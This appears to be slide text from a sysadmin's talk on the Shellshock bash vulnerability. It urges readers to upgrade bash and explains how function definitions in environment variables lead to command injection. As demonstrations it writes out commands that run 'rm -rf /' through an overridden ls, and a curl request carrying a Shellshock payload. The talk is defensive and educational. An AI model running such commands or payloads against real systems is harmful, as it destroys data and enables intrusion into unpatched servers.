Shellshock
Greg Karékinian
I'm a concerned sysadmin.
PSA: UPGRADE YOUR BASH. NOW.
TL;DR: UPGRADE YOUR BASH. NOW.
https://shellshocker.net/
Debian/Ubuntu
sudo apt-get update &&\
sudo apt-get install --only-upgrade bash
Red Hat / Fedora / CentOS
sudo yum -y update bash
Bash incorrectly handled trailing code in function definitions
You can set environment variables to functions
What is an environment variable?
set environment variable
$ RAILS_ENV=production \
bundle exec rails server
set environment variables to functions
$ hi='() { echo "Oh hi"; }'\
bash -c hi
$ Oh hi
set environment variables to functions
$ env hi='() { echo "Oh hi"; }'\
bash -c hi
$ Oh hi
set environment variables to functions
$ export hi='() { echo "Oh hi"; }'
$ bash -c hi
$ Oh hi
Like a closure / lambda / anonymous function!
Environment variable command injection
env
$ env /bin/ls='() { rm -rf /; }'\
bash -c /bin/ls
export
$ export ls='() { rm -rf /; }'
I'm a web developer, why should I care?
Everyone should care. Software is everywhere.
Demo: overriding commands in environment variables
I couldn't make it work. But I'm curious.
It works! It works so well, it's SCARY.
Malicious requests
curl localhost:3000/?"() \{ :; \};\
touch /tmp/lala"
Malicious requests
"() \{ :; \}; touch /tmp/lala"
That code is now going to run on EVERY REQUEST
In Phusion Passenger 5 we're not going to set any environment variables based on request data.
— FooBarWidget
https://news.ycombinator.com/item?id=8369776
Why did anyone think that "feature" could be useful?
Passenger doesn't run as root (usually)
Steal database credentials
Install malware, create botnets, DDoS
What else uses bash and CGI scripts?
Routers. Cheap routers. They're everywhere.
Where do we go from here?
Security and human nature:
Wait until something goes TERRIBLY WRONG.
unattended-upgrade all the fucking time.
"The code parsing the code to avoid code execution may allow code execution."
https://twitter.com/patio11/status/515920193491451904
Thoughts?
